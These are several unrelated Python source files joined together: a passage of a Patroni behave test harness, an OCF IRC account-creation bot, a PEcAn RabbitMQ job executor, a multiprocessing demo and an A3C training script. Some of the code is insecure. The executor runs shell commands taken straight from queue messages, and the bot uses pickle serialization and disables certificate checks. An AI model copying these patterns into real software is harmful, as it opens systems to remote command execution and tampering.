for subsubclass in subclass.get_subclasses():
yield subsubclass
yield subclass
@classmethod
def name(cls):
return cls.__name__[:-10].lower()
class ConsulController(AbstractDcsController):
def __init__(self, context):
super(ConsulController, self).__init__(context)
os.environ['PATRONI_CONSUL_HOST'] = 'localhost:8500'
os.environ['PATRONI_CONSUL_REGISTER_SERVICE'] = 'on'
self._config_file = None
import consul
self._client = consul.Consul()
def _start(self):
self._config_file = self._work_directory + '.json'
with open(self._config_file, 'wb') as f:
f.write(b'{"session_ttl_min":"5s","server":true,"bootstrap":true,"advertise_addr":"127.0.0.1"}')
return subprocess.Popen(['consul', 'agent', '-config-file', self._config_file, '-data-dir',
self._work_directory], stdout=self._log, stderr=subprocess.STDOUT)
def stop(self, kill=False, timeout=15):
super(ConsulController, self).stop(kill=kill, timeout=timeout)
if self._config_file:
os.unlink(self._config_file)
def _is_running(self):
try:
return bool(self._client.status.leader())
except Exception:
return False
def path(self, key=None, scope='batman'):
return super(ConsulController, self).path(key, scope)[1:]
def query(self, key, scope='batman'):
_, value = self._client.kv.get(self.path(key, scope))
return value and value['Value'].decode('utf-8')
def cleanup_service_tree(self):
self._client.kv.delete(self.path(scope=''), recurse=True)
def start(self, max_wait_limit=15):
super(ConsulController, self).start(max_wait_limit)
class AbstractEtcdController(AbstractDcsController):
""" handles all etcd related tasks, used for the tests setup and cleanup """
def __init__(self, context, client_cls):
super(AbstractEtcdController, self).__init__(context)
self._client_cls = client_cls
def _start(self):
return subprocess.Popen(["etcd", "--debug", "--data-dir", self._work_directory],
stdout=self._log, stderr=subprocess.STDOUT)
def _is_running(self):
from patroni.dcs.etcd import DnsCachingResolver
# if etcd is running, but we didn't start it
try:
self._client = self._client_cls({'host': 'localhost', 'port': 2379, 'retry_timeout': 30,
'patronictl': 1}, DnsCachingResolver())
return True
except Exception:
return False
class EtcdController(AbstractEtcdController):
def __init__(self, context):
from patroni.dcs.etcd import EtcdClient
super(EtcdController, self).__init__(context, EtcdClient)
os.environ['PATRONI_ETCD_HOST'] = 'localhost:2379'
def query(self, key, scope='batman'):
import etcd
try:
return self._client.get(self.path(key, scope)).value
except etcd.EtcdKeyNotFound:
return None
def cleanup_service_tree(self):
import etcd
try:
self._client.delete(self.path(scope=''), recursive=True)
except (etcd.EtcdKeyNotFound, etcd.EtcdConnectionFailed):
return
except Exception as e:
assert False, "exception when cleaning up etcd contents: {0}".format(e)
class Etcd3Controller(AbstractEtcdController):
def __init__(self, context):
from patroni.dcs.etcd3 import Etcd3Client
super(Etcd3Controller, self).__init__(context, Etcd3Client)
os.environ['PATRONI_ETCD3_HOST'] = 'localhost:2379'
def query(self, key, scope='batman'):
import base64
response = self._client.range(self.path(key, scope))
for k in response.get('kvs', []):
return base64.b64decode(k['value']).decode('utf-8') if 'value' in k else None
def cleanup_service_tree(self):
try:
self._client.deleteprefix(self.path(scope=''))
except Exception as e:
assert False, "exception when cleaning up etcd contents: {0}".format(e)
class KubernetesController(AbstractDcsController):
def __init__(self, context):
super(KubernetesController, self).__init__(context)
self._namespace = 'default'
self._labels = {"application": "patroni"}
self._label_selector = ','.join('{0}={1}'.format(k, v) for k, v in self._labels.items())
os.environ['PATRONI_KUBERNETES_LABELS'] = json.dumps(self._labels)
os.environ['PATRONI_KUBERNETES_USE_ENDPOINTS'] = 'true'
os.environ['PATRONI_KUBERNETES_BYPASS_API_SERVICE'] = 'true'
from patroni.dcs.kubernetes import k8s_client, k8s_config
k8s_config.load_kube_config(context='local')
self._client = k8s_client
self._api = self._client.CoreV1Api()
def _start(self):
pass
def create_pod(self, name, scope):
labels = self._labels.copy()
labels['cluster-name'] = scope
metadata = self._client.V1ObjectMeta(namespace=self._namespace, name=name, labels=labels)
spec = self._client.V1PodSpec(containers=[self._client.V1Container(name=name, image='empty')])
body = self._client.V1Pod(metadata=metadata, spec=spec)
self._api.create_namespaced_pod(self._namespace, body)
def delete_pod(self, name):
try:
self._api.delete_namespaced_pod(name, self._namespace, body=self._client.V1DeleteOptions())
except Exception:
pass
while True:
try:
self._api.read_namespaced_pod(name, self._namespace)
except Exception:
break
def query(self, key, scope='batman'):
if key.startswith('members/'):
pod = self._api.read_namespaced_pod(key[8:], self._namespace)
return (pod.metadata.annotations or {}).get('status', '')
else:
try:
ep = scope + {'leader': '', 'history': '-config', 'initialize': '-config'}.get(key, '-' + key)
e = self._api.read_namespaced_endpoints(ep, self._namespace)
if key != 'sync':
return e.metadata.annotations[key]
else:
return json.dumps(e.metadata.annotations)
except Exception:
return None
def cleanup_service_tree(self):
try:
self._api.delete_collection_namespaced_pod(self._namespace, label_selector=self._label_selector)
except Exception:
pass
try:
self._api.delete_collection_namespaced_endpoints(self._namespace, label_selector=self._label_selector)
except Exception:
pass
while True:
result = self._api.list_namespaced_pod(self._namespace, label_selector=self._label_selector)
if len(result.items) < 1:
break
def _is_running(self):
return True
class ZooKeeperController(AbstractDcsController):
""" handles all zookeeper related tasks, used for the tests setup and cleanup """
def __init__(self, context, export_env=True):
super(ZooKeeperController, self).__init__(context, False)
if export_env:
os.environ['PATRONI_ZOOKEEPER_HOSTS'] = "'localhost:2181'"
import kazoo.client
self._client = kazoo.client.KazooClient()
def _start(self):
pass # TODO: implement later
def query(self, key, scope='batman'):
import kazoo.exceptions
try:
return self._client.get(self.path(key, scope))[0].decode('utf-8')
except kazoo.exceptions.NoNodeError:
return None
def cleanup_service_tree(self):
import kazoo.exceptions
try:
self._client.delete(self.path(scope=''), recursive=True)
except (kazoo.exceptions.NoNodeError):
return
except Exception as e:
assert False, "exception when cleaning up zookeeper contents: {0}".format(e)
def _is_running(self):
# if zookeeper is running, but we didn't start it
if self._client.connected:
return True
try:
return self._client.start(1) or True
except Exception:
return False
class MockExhibitor(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.end_headers()
self.wfile.write(b'{"servers":["127.0.0.1"],"port":2181}')
def log_message(self, fmt, *args):
pass
class ExhibitorController(ZooKeeperController):
def __init__(self, context):
super(ExhibitorController, self).__init__(context, False)
port = 8181
exhibitor = HTTPServer(('', port), MockExhibitor)
exhibitor.daemon_thread = True
exhibitor_thread = threading.Thread(target=exhibitor.serve_forever)
exhibitor_thread.daemon = True
exhibitor_thread.start()
os.environ.update({'PATRONI_EXHIBITOR_HOSTS': 'localhost', 'PATRONI_EXHIBITOR_PORT': str(port)})
class RaftController(AbstractDcsController):
CONTROLLER_ADDR = 'localhost:1234'
PASSWORD = '12345'
def __init__(self, context):
super(RaftController, self).__init__(context)
os.environ.update(PATRONI_RAFT_PARTNER_ADDRS="'" + self.CONTROLLER_ADDR + "'",
PATRONI_RAFT_PASSWORD=self.PASSWORD, RAFT_PORT='1234')
self._raft = None
def _start(self):
env = os.environ.copy()
del env['PATRONI_RAFT_PARTNER_ADDRS']
env['PATRONI_RAFT_SELF_ADDR'] = self.CONTROLLER_ADDR
env['PATRONI_RAFT_DATA_DIR'] = self._work_directory
return subprocess.Popen([sys.executable, '-m', 'coverage', 'run',
'--source=patroni', '-p', 'patroni_raft_controller.py'],
stdout=self._log, stderr=subprocess.STDOUT, env=env)
def query(self, key, scope='batman'):
ret = self._raft.get(self.path(key, scope))
return ret and ret['value']
def set(self, key, value):
self._raft.set(self.path(key), value)
def cleanup_service_tree(self):
from patroni.dcs.raft import KVStoreTTL
if self._raft:
self._raft.destroy()
self.stop()
os.makedirs(self._work_directory)
self.start()
ready_event = threading.Event()
self._raft = KVStoreTTL(ready_event.set, None, None, partner_addrs=[self.CONTROLLER_ADDR], password=self.PASSWORD)
self._raft.startAutoTick()
ready_event.wait()
class PatroniPoolController(object):
BACKUP_SCRIPT = [sys.executable, 'features/backup_create.py']
ARCHIVE_RESTORE_SCRIPT = ' '.join((sys.executable, os.path.abspath('features/archive-restore.py')))
def __init__(self, context):
self._context = context
self._dcs = None
self._output_dir = None
self._patroni_path = None
self._processes = {}
self.create_and_set_output_directory('')
self.known_dcs = {subclass.name(): subclass for subclass in AbstractDcsController.get_subclasses()}
@property
def patroni_path(self):
if self._patroni_path is None:
cwd = os.path.realpath(__file__)
while True:
cwd, entry = os.path.split(cwd)
if entry == 'features' or cwd == '/':
break
self._patroni_path = cwd
return self._patroni_path
@property
def output_dir(self):
return self._output_dir
def start(self, name, max_wait_limit=40, custom_config=None):
if name not in self._processes:
self._processes[name] = PatroniController(self._context, name, self.patroni_path,
self._output_dir, custom_config)
self._processes[name].start(max_wait_limit)
def __getattr__(self, func):
if func not in ['stop', 'query', 'write_label', 'read_label', 'check_role_has_changed_to',
'add_tag_to_config', 'get_watchdog', 'patroni_hang', 'backup']:
raise AttributeError("PatroniPoolController instance has no attribute '{0}'".format(func))
def wrapper(name, *args, **kwargs):
return getattr(self._processes[name], func)(*args, **kwargs)
return wrapper
def stop_all(self):
for ctl in self._processes.values():
ctl.cancel_background()
ctl.stop()
self._processes.clear()
def create_and_set_output_directory(self, feature_name):
feature_dir = os.path.join(self.patroni_path, 'features', 'output', feature_name.replace(' ', '_'))
if os.path.exists(feature_dir):
shutil.rmtree(feature_dir)
os.makedirs(feature_dir)
self._output_dir = feature_dir
def clone(self, from_name, cluster_name, to_name):
f = self._processes[from_name]
custom_config = {
'scope': cluster_name,
'bootstrap': {
'method': 'pg_basebackup',
'pg_basebackup': {
'command': " ".join(self.BACKUP_SCRIPT) + ' --walmethod=stream --dbname=' + f.backup_source
},
'dcs': {
'postgresql': {
'parameters': {
'max_connections': 101
}
}
}
},
'postgresql': {
'parameters': {
'archive_mode': 'on',
'archive_command': (self.ARCHIVE_RESTORE_SCRIPT + ' --mode archive ' +
'--dirname {} --filename %f --pathname %p').format(
os.path.join(self.patroni_path, 'data', 'wal_archive'))
},
'authentication': {
'superuser': {'password': 'zalando1'},
'replication': {'password': 'rep-pass1'}
}
}
}
self.start(to_name, custom_config=custom_config)
def bootstrap_from_backup(self, name, cluster_name):
custom_config = {
'scope': cluster_name,
'bootstrap': {
'method': 'backup_restore',
'backup_restore': {
'command': (sys.executable + ' features/backup_restore.py --sourcedir=' +
os.path.join(self.patroni_path, 'data', 'basebackup')),
'recovery_conf': {
'recovery_target_action': 'promote',
'recovery_target_timeline': 'latest',
'restore_command': (self.ARCHIVE_RESTORE_SCRIPT + ' --mode restore ' +
'--dirname {} --filename %f --pathname %p').format(
os.path.join(self.patroni_path, 'data', 'wal_archive'))
}
}
},
'postgresql': {
'authentication': {
'superuser': {'password': 'zalando2'},
'replication': {'password': 'rep-pass2'}
}
}
}
self.start(name, custom_config=custom_config)
@property
def dcs(self):
if self._dcs is None:
self._dcs = os.environ.pop('DCS', 'etcd')
assert self._dcs in self.known_dcs, 'Unsupported dcs: ' + self._dcs
return self._dcs
class WatchdogMonitor(object):
"""Testing harness for emulating a watchdog device as a named pipe. Because we can't easily emulate ioctl's we
require a custom driver on Patroni side. The device takes no action, only notes if it was pinged and/or triggered.
"""
def __init__(self, name, work_directory, output_dir):
self.fifo_path = os.path.join(work_directory, 'data', 'watchdog.{0}.fifo'.format(name))
self.fifo_file = None
self._stop_requested = False # Relying on bool setting being atomic
self._thread = None
self.last_ping = None
self.was_pinged = False
self.was_closed = False
self._was_triggered = False
self.timeout = 60
self._log_file = open(os.path.join(output_dir, 'watchdog.{0}.log'.format(name)), 'w')
self._log("watchdog {0} initialized".format(name))
def _log(self, msg):
tstamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S,%f")
self._log_file.write("{0}: {1}\n".format(tstamp, msg))
def start(self):
assert self._thread is None
self._stop_requested = False
self._log("starting fifo {0}".format(self.fifo_path))
fifo_dir = os.path.dirname(self.fifo_path)
if os.path.exists(self.fifo_path):
os.unlink(self.fifo_path)
elif not os.path.exists(fifo_dir):
os.mkdir(fifo_dir)
os.mkfifo(self.fifo_path)
self.last_ping = time.time()
self._thread = threading.Thread(target=self.run)
self._thread.start()
def run(self):
try:
while not self._stop_requested:
self._log("opening")
self.fifo_file = os.open(self.fifo_path, os.O_RDONLY)
try:
self._log("Fifo {0} connected".format(self.fifo_path))
self.was_closed = False
while not self._stop_requested:
c = os.read(self.fifo_file, 1)
if c == b'X':
self._log("Stop requested")
return
elif c == b'':
self._log("Pipe closed")
break
elif c == b'C':
command = b''
c = os.read(self.fifo_file, 1)
while c != b'\n' and c != b'':
command += c
c = os.read(self.fifo_file, 1)
command = command.decode('utf8')
if command.startswith('timeout='):
self.timeout = int(command.split('=')[1])
self._log("timeout={0}".format(self.timeout))
elif c in [b'V', b'1']:
cur_time = time.time()
if cur_time - self.last_ping > self.timeout:
self._log("Triggered")
self._was_triggered = True
if c == b'V':
self._log("magic close")
self.was_closed = True
elif c == b'1':
self.was_pinged = True
self._log("ping after {0} seconds".format(cur_time - (self.last_ping or cur_time)))
self.last_ping = cur_time
else:
self._log('Unknown command {0} received from fifo'.format(c))
finally:
self.was_closed = True
self._log("closing")
os.close(self.fifo_file)
except Exception as e:
self._log("Error {0}".format(e))
finally:
self._log("stopping")
self._log_file.flush()
if os.path.exists(self.fifo_path):
os.unlink(self.fifo_path)
def stop(self):
self._log("Monitor stop")
self._stop_requested = True
try:
if os.path.exists(self.fifo_path):
fd = os.open(self.fifo_path, os.O_WRONLY)
os.write(fd, b'X')
os.close(fd)
except Exception as e:
self._log("err while closing: {0}".format(str(e)))
if self._thread:
self._thread.join()
self._thread = None
def reset(self):
self._log("reset")
self.was_pinged = self.was_closed = self._was_triggered = False
@property
def was_triggered(self):
delta = time.time() - self.last_ping
triggered = self._was_triggered or not self.was_closed and delta > self.timeout
self._log("triggered={0}, {1}s left".format(triggered, self.timeout - delta))
return triggered
# actions to execute on start/stop of the tests and before running individual features
def before_all(context):
os.environ.update({'PATRONI_RESTAPI_USERNAME': 'username', 'PATRONI_RESTAPI_PASSWORD': 'password'})
context.ci = any(a in os.environ for a in ('TRAVIS_BUILD_NUMBER', 'BUILD_NUMBER', 'GITHUB_ACTIONS'))
context.timeout_multiplier = 5 if context.ci else 1 # MacOS sometimes is VERY slow
context.pctl = PatroniPoolController(context)
context.dcs_ctl = context.pctl.known_dcs[context.pctl.dcs](context)
context.dcs_ctl.start()
try:
context.dcs_ctl.cleanup_service_tree()
except AssertionError: # after_all handlers won't be executed in before_all
context.dcs_ctl.stop()
raise
def after_all(context):
context.dcs_ctl.stop()
subprocess.call([sys.executable, '-m', 'coverage', 'combine'])
subprocess.call([sys.executable, '-m', 'coverage', 'report'])
def before_feature(context, feature):
""" create per-feature output directory to collect Patroni and PostgreSQL logs """
context.pctl.create_and_set_output_directory(feature.name)
def after_feature(context, feature):
""" stop all Patronis, remove their data directory and cleanup the keys in etcd """
context.pctl.stop_all()
shutil.rmtree(os.path.join(context.pctl.patroni_path, 'data'))
context.dcs_ctl.cleanup_service_tree()
if feature.status == 'failed':
shutil.copytree(context.pctl.output_dir, context.pctl.output_dir + '_failed')
|
ircbot.py | #!/usr/bin/env python3
"""IRC bot for doing stupid stuff and sometimes handling commands for account creation."""
import argparse
import collections
import functools
import getpass
import pkgutil
import re
import ssl
import threading
import time
from configparser import ConfigParser
from datetime import date
import irc.bot
import irc.connection
from celery import Celery
from irc.client import NickMask
from ocflib.account.submission import AccountCreationCredentials
from ocflib.account.submission import get_tasks
from ircbot.plugin import create
from ircbot.plugin import debian_security
from ircbot.plugin import rackspace_monitoring
IRC_HOST = 'irc'
IRC_PORT = 6697
user = getpass.getuser()
if user == 'nobody':
IRC_NICKNAME = 'create'
IRC_CHANNELS_OPER = frozenset(('#rebuild', '#atool'))
IRC_CHANNELS_ANNOUNCE = frozenset(('#atool',))
IRC_CHANNELS_JOIN_MYSQL = True
else:
IRC_NICKNAME = 'create-{}'.format(user)
IRC_CHANNELS_OPER = IRC_CHANNELS_ANNOUNCE = frozenset(('#' + user,))
IRC_CHANNELS_JOIN_MYSQL = False
NUM_RECENT_MESSAGES = 10
# Check for Debian security announcements every 5 minutes
DSA_FREQ = 5
# Print out Rackspace monitoring status at most every minute
MONITOR_FREQ = 1
# 512 bytes is the max message length set by RFC 2812 on the max single message
# length, so messages need to split up into at least sections of that size,
# however clients (hexchat at least) appear to start cutting off less than that
# amount of text, so cut into small blocks to avoid that.
MAX_CLIENT_MSG = 435
class Listener(collections.namedtuple(
'Listener',
('pattern', 'fn', 'help_text', 'require_mention', 'require_oper', 'require_privileged_oper'),
)):
__slots__ = ()
@property
def help(self):
if self.help_text:
return self.help_text
else:
return self.fn.__doc__
@property
def plugin_name(self):
if isinstance(self.fn, functools.partial):
return self.fn.func.__module__
else:
return self.fn.__module__
class MatchedMessage(collections.namedtuple(
'MatchedMessage',
('channel', 'text', 'raw_text', 'match', 'is_oper', 'nick', 'respond'),
)):
"""A message matching a listener.
:param channel: IRC channel (as a string).
:param text: The message text after processing. Processing includes
chopping off the bot nickname from the front.
:param raw_text: The raw, unparsed text. Usually "text" is more useful.
:param match: The regex match object.
:param is_oper: Whether the user is an operator.
:param nick: The nickname of the user.
:param respond: A function to respond to this message in the correct
channel and pinging the correct person.
"""
__slots__ = ()
class CreateBot(irc.bot.SingleServerIRCBot):
def __init__(
self,
tasks,
nickserv_password,
rt_password,
rackspace_apikey,
weather_apikey,
mysql_password,
marathon_creds,
googlesearch_key,
googlesearch_cx,
discourse_apikey,
twitter_apikeys,
):
self.recent_messages = collections.defaultdict(
functools.partial(collections.deque, maxlen=NUM_RECENT_MESSAGES),
)
self.topics = {}
self.tasks = tasks
self.rt_password = rt_password
self.nickserv_password = nickserv_password
self.rackspace_apikey = rackspace_apikey
self.weather_apikey = weather_apikey
self.mysql_password = mysql_password
self.marathon_creds = marathon_creds
self.googlesearch_key = googlesearch_key
self.googlesearch_cx = googlesearch_cx
self.discourse_apikey = discourse_apikey
self.twitter_apikeys = twitter_apikeys
self.listeners = set()
self.plugins = {}
self.extra_channels = set() # plugins can add stuff here
# Register plugins before joining the server.
self.register_plugins()
factory = irc.connection.Factory(wrapper=ssl.wrap_socket)
super().__init__(
[(IRC_HOST, IRC_PORT)],
IRC_NICKNAME,
IRC_NICKNAME,
connect_factory=factory,
)
def register_plugins(self):
for importer, mod_name, _ in pkgutil.iter_modules(['ircbot/plugin']):
mod = importer.find_module(mod_name).load_module(mod_name)
self.plugins[mod_name] = mod
register = getattr(mod, 'register', None)
if register is not None:
register(self)
def listen(
self,
pattern,
fn,
flags=0,
help_text=None,
require_mention=False,
require_oper=False,
require_privileged_oper=False,
):
self.listeners.add(Listener(
pattern=re.compile(pattern, flags),
fn=fn,
help_text=help_text,
require_mention=require_mention,
require_oper=require_oper,
require_privileged_oper=require_privileged_oper,
))
def on_welcome(self, conn, _):
conn.privmsg('NickServ', 'identify {}'.format(self.nickserv_password))
# Join the "main" IRC channels.
for channel in IRC_CHANNELS_OPER | IRC_CHANNELS_ANNOUNCE | self.extra_channels:
conn.join(channel)
def on_pubmsg(self, conn, event):
if event.target in self.channels:
is_oper = False
# event.source is like 'ckuehl!~ckuehl@raziel.ckuehl.me'
assert event.source.count('!') == 1
user = NickMask(event.source).nick
# Don't respond to other create bots to avoid loops
if user.startswith('create'):
return
if user in self.channels[event.target].opers():
is_oper = True
assert len(event.arguments) == 1
raw_text = event.arguments[0]
def respond(raw_text, ping=True):
fmt = '{user}: {raw_text}' if ping else '{raw_text}'
full_raw_text = fmt.format(user=user, raw_text=raw_text)
self.say(event.target, full_raw_text)
was_mentioned = raw_text.startswith((IRC_NICKNAME + ' ', IRC_NICKNAME + ': '))
for listener in self.listeners:
text = raw_text
if listener.require_mention:
if was_mentioned:
# Chop off the bot nickname.
text = text.split(' ', 1)[1]
else:
continue
if (
(listener.require_oper or listener.require_privileged_oper) and
not is_oper
):
continue
# Prevent people from creating a channel, becoming oper,
# inviting the bot, and approving/rejecting accounts without
# "real" oper privilege.
if listener.require_privileged_oper and event.target not in IRC_CHANNELS_OPER:
continue
match = listener.pattern.search(text)
if match is not None:
msg = MatchedMessage(
channel=event.target,
text=text,
raw_text=raw_text,
match=match,
is_oper=is_oper,
nick=user,
respond=respond,
)
listener.fn(self, msg)
# everything gets logged except commands
if raw_text[0] != '!':
self.recent_messages[event.target].appendleft((user, raw_text))
def on_currenttopic(self, connection, event):
channel, topic = event.arguments
self.topics[channel] = topic
def on_topic(self, connection, event):
topic, = event.arguments
self.topics[event.target] = topic
def on_invite(self, connection, event):
# TODO: make this more plugin-like
import ircbot.plugin.channels
return ircbot.plugin.channels.on_invite(self, connection, event)
def bump_topic(self):
for channel, topic in self.topics.items():
def plusone(m):
return '{}: {}'.format(m.group(1), int(m.group(2)) + 1)
new_topic = re.sub(r'(days since.*?): (\d+)', plusone, topic)
if topic != new_topic:
self.connection.topic(channel, new_topic=new_topic)
def say(self, channel, message):
# Find the length of the full message
msg_len = len('PRIVMSG {} :{}\r\n'.format(channel, message).encode('utf-8'))
# The message must be split up if over the length limit
if msg_len > MAX_CLIENT_MSG:
# Split up the full message into chunks to send
msg_range = range(0, len(message), MAX_CLIENT_MSG)
messages = [message[i:i + MAX_CLIENT_MSG] for i in msg_range]
for msg in messages:
self.connection.privmsg(channel, msg)
else:
self.connection.privmsg(channel, message)
def timer(bot):
last_date = None
last_dsa_check = None
last_monitor_check = None
last_monitor_status = None
while not bot.connection.connected:
time.sleep(2)
# TODO: timers should register as plugins like listeners do
while True:
last_date, old = date.today(), last_date
if old and last_date != old:
bot.bump_topic()
if last_dsa_check is None or time.time() - last_dsa_check > 60 * DSA_FREQ:
last_dsa_check = time.time()
for line in debian_security.get_new_dsas():
bot.say('#rebuild', line)
if last_monitor_check is None or time.time() - last_monitor_check > 60 * MONITOR_FREQ:
last_monitor_check = time.time()
try:
new_monitor_status = rackspace_monitoring.get_summary(bot.rackspace_apikey)
except Exception as ex:
new_monitor_status = 'Error getting status: {}'.format(ex)
# Only print out Rackspace status if it has changed since the last check
if last_monitor_status and last_monitor_status != new_monitor_status:
bot.say('#rebuild', new_monitor_status)
last_monitor_status = new_monitor_status
time.sleep(1)
def main():
parser = argparse.ArgumentParser(
description='OCF account creation IRC bot',
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
'-c',
'--config',
default='/etc/ocf-ircbot/ocf-ircbot.conf',
help='Config file to read from.',
)
args = parser.parse_args()
conf = ConfigParser()
conf.read(args.config)
celery = Celery(
broker=conf.get('celery', 'broker'),
backend=conf.get('celery', 'backend'),
)
celery.conf.broker_use_ssl = {
'ssl_ca_certs': '/etc/ssl/certs/ca-certificates.crt',
'ssl_cert_reqs': ssl.CERT_REQUIRED,
}
# `redis_backend_use_ssl` is an OCF patch which was proposed upstream:
# https://github.com/celery/celery/pull/3831
celery.conf.redis_backend_use_ssl = {
'ssl_cert_reqs': ssl.CERT_NONE,
}
# TODO: stop using pickle
celery.conf.task_serializer = 'pickle'
celery.conf.result_serializer = 'pickle'
celery.conf.accept_content = {'pickle'}
creds = AccountCreationCredentials(**{
field:
conf.get(*field.split('_'))
for field in AccountCreationCredentials._fields
})
tasks = get_tasks(celery, credentials=creds)
rt_password = conf.get('rt', 'password')
nickserv_password = conf.get('nickserv', 'password')
rackspace_apikey = conf.get('rackspace', 'apikey')
weather_apikey = conf.get('weather_underground', 'apikey')
mysql_password = conf.get('mysql', 'password')
marathon_creds = (
conf.get('marathon', 'user'),
conf.get('marathon', 'password'),
)
googlesearch_key = conf.get('googlesearch', 'key')
googlesearch_cx = conf.get('googlesearch', 'cx')
discourse_apikey = conf.get('discourse', 'apikey')
twitter_apikeys = (
conf.get('twitter', 'apikey'),
conf.get('twitter', 'apisecret'),
)
# irc bot thread
bot = CreateBot(
tasks, nickserv_password, rt_password, rackspace_apikey,
weather_apikey, mysql_password, marathon_creds,
googlesearch_key, googlesearch_cx, discourse_apikey,
twitter_apikeys,
)
bot_thread = threading.Thread(target=bot.start, daemon=True)
bot_thread.start()
# celery thread
celery_thread = threading.Thread(
target=create.celery_listener,
args=(bot, celery, conf.get('celery', 'broker')),
daemon=True,
)
celery_thread.start()
# timer thread
timer_thread = threading.Thread(
target=timer,
args=(bot,),
daemon=True,
)
timer_thread.start()
while True:
for thread in (bot_thread, celery_thread, timer_thread):
if not thread.is_alive():
raise RuntimeError('Thread exited: {}'.format(thread))
time.sleep(0.1)
if __name__ == '__main__':
main()
|
executor.py | import json
import logging
import os
import socket
import subprocess
import sys
import threading
import time
import uuid
import pika
import shutil
rabbitmq_uri = os.getenv('RABBITMQ_URI', 'amqp://guest:guest@rabbitmq/%2F')
rabbitmq_queue = os.getenv('RABBITMQ_QUEUE', 'pecan')
default_application = os.getenv('APPLICATION', 'job.sh')
class Worker:
def __init__(self, method, properties, body):
self.method = method
self.properties = properties
self.body = body
self.finished = False
def runfunc(self):
logging.debug(self.body)
jbody = json.loads(self.body.decode('UTF-8'))
folder = jbody.get('folder')
rebuild = jbody.get('rebuild')
pecan_xml = jbody.get('pecan_xml')
custom_application = jbody.get('custom_application')
if rebuild is not None:
logging.info("Rebuilding PEcAn with make")
application = 'make'
folder = '/pecan'
elif pecan_xml is not None:
# Passed entire pecan XML as a string
logging.info("Running XML passed directly")
try:
os.mkdir(folder)
except OSError as e:
logging.info("Caught the following OSError. ",
"If it's just that the directory exists, ",
"this can probably be ignored: ", e)
workflow_path = os.path.join(folder, "workflow.R")
shutil.copyfile("/work/workflow.R", workflow_path)
xml_file = open(os.path.join(folder, "pecan.xml"), "w")
xml_file.write(pecan_xml)
xml_file.close()
# Set variables for execution
application = "R CMD BATCH workflow.R"
elif custom_application is not None:
application = custom_application
else:
logging.info("Running default command: %s" % default_application)
application = default_application
logging.info("Running command: %s" % application)
logging.info("Starting command in directory %s." % folder)
try:
output = subprocess.check_output(application, stderr=subprocess.STDOUT, shell=True, cwd=folder)
status = 'OK'
except subprocess.CalledProcessError as e:
logging.exception("Error running job.")
output = e.output
status = 'ERROR'
except Exception as e:
logging.exception("Error running job.")
output = str(e)
status = 'ERROR'
logging.info("Finished running job with status " + status)
logging.info(output)
try:
with open(os.path.join(folder, 'rabbitmq.out'), 'w') as out:
out.write(str(output) + "\n")
out.write(status + "\n")
except Exception:
logging.exception("Error writing status.")
# done processing, set finished to true
self.finished = True
# called for every message, this will start the program and ack message if all is ok.
def callback(ch, method, properties, body):
global worker
# do not pass channel, pika is not threadsafe, only receiver is allowed to use channel
worker = Worker(method, properties, body)
thread = threading.Thread(target=worker.runfunc)
thread.start()
# connect to rabbitmq and receive jobs, only this function can use the channel.
def receiver():
global worker
# create connection to rabbitmq
connection = pika.BlockingConnection(pika.URLParameters(rabbitmq_uri))
channel = connection.channel()
# make sure queue exists
channel.queue_declare(queue=rabbitmq_queue, durable=True)
# receive 1 message at a time, call callback function
channel.basic_qos(prefetch_count=1)
channel.basic_consume(on_message_callback=callback, queue=rabbitmq_queue)
# receive messages
worker = None
logging.info('[*] Waiting for messages. To exit press CTRL+C')
try:
while True:
# use polling to allow for heartbeats, the actual work is done
# in another thread which should not talk in channel!
channel.connection.process_data_events(time_limit=1) # 1 second
if worker and worker.finished:
channel.basic_ack(delivery_tag=worker.method.delivery_tag)
worker = None
except KeyboardInterrupt:
pass
finally:
connection.close()
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)-15s [%(threadName)-15s] %(levelname)-7s : %(name)s - %(message)s',
level=logging.INFO)
logging.getLogger('requests.packages.urllib3.connectionpool').setLevel(logging.WARN)
# start listening for new jobs
receiver()
|
__main__.py | import multiprocessing
from multiprocessing import Queue, Process
import time
def listen(input_q):
output_qs = []
try:
while True:
item = input_q.get()
if item == None:
return
elif isinstance(item, multiprocessing.queues.Queue):
print("ADDING NEW OUTPUT QUEUE")
output_qs.append(item)
else:
print("#"*50)
print(item)
print("#"*50)
for q in output_qs:
q.put(item)
except KeyboardInterrupt:
pass
class A:
def __init__(self, q):
self.q = q
def run_a(a):
r = a.q.get()
print(r)
if __name__ == "__main__":
a = A(Queue())
p = Process(target=run_a, args=(a,))
p.start()
a.q.put("hello")
p.join()
"""
if __name__ == "__main__":
input_q = Queue()
output_qs = []
p = Process(target=listen, args=(input_q, ))
p.start()
try:
while True:
time.sleep(0.2)
for q in output_qs:
if q.empty():
continue
print(f"{q}: {q.get()}")
cmd = input(">>> ")
if cmd == "exit":
break
elif cmd == "add":
output_qs.append(Queue())
input_q.put(output_qs[-1])
input_q.put(cmd)
except KeyboardInterrupt:
pass
print("")
input_q.put(None)
p.join()
"""
|
main.py | #!/usr/bin/env python3
import sys, os
from threading import Thread
import gym
import threading
import numpy as np
import tensorflow as tf
from a3c import A3C_Worker, A3C_Net
def main():
#training vars
worker_num = 4
global_train_steps = 1000 #50000 = 1 million steps
test = True
env_name = 'CartPole-v0'
#env_name = 'Pendulum-v0'
#env_name = 'Pong-v0'
#env_name = 'SpaceInvaders-v0'
#env_name = 'FetchReach-v0'
#env = gym.wrappers.Monitor(env, directory='./logs', force=True,
# video_callable=lambda n: n == episode_max)
#init global, workers
workers = []
coordinator = tf.train.Coordinator()
sess = tf.Session()
env = gym.make(env_name)
env.seed(0)
global_net = A3C_Net(env, 'global', sess)
for i in range(worker_num):
name = 'worker_%s' % i
local_net = A3C_Net(env, name, sess)
workers.append(A3C_Worker(coordinator, global_net, local_net,
name))
print ('training for %s batches\n' % global_train_steps)
#start training asynchronously
threads = []
for i,worker in enumerate(workers):
#lambda so we can avoid passing args to thread call
env = gym.make(env_name)
env.seed(i)
work = lambda: worker.train(env, global_train_steps)
thread = Thread(target=work)
#thread.daemon = True
thread.start()
#thread.join() #block main until thread terminates
#worker.train(env, steps=step_max)
threads.append(thread)
#apply gradients while threads do work
global_net.update_loop(global_train_steps)
coordinator.join(threads) #wait for threads to finish
#output training info
print
for worker in workers:
print ('[*] %s trained for: %s' % (worker.scope,
worker.local_net.get_step()))
print ('[*] global trained for: %s' % global_net.get_step())
